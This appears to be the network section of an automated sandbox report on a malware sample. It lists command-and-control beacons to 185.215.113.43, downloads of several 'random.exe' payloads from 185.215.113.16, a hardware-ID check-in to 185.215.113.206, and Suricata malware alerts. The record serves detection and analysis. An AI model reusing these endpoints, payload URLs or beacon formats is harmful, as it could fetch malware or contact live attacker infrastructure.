                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:53:57 GMTIf-None-Match: "673f1145-1d6200"
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007918001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:54:04 GMTIf-None-Match: "673f114c-1b7a00"
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCBHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 33 37 32 30 42 37 32 32 38 39 39 32 32 34 37 36 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="hwid"84C3720B7228992247664------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="build"mars------KFIJEGCBGIDGHIDHDGCB--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007919001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:52:12 GMTIf-None-Match: "673f10dc-e1000"
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007920001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:52:38 GMTIf-None-Match: "673f10f6-2ae600"
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007921001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 33 37 32 30 42 37 32 32 38 39 39 32 32 34 37 36 36 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"84C3720B7228992247664------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"mars------HDGCFHIDAKECFHIEBFCG--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49802 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49820 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49826 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49827 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49839 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49847 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49850 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49855 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49863 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49866 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49846 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49870 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49874 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49924 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49942 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49912 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49916 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49954 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49970 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49976 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50013 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50015 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50025 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50046 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50057 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50087 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50100 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50121 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50108 -> 188.114.96.3:443
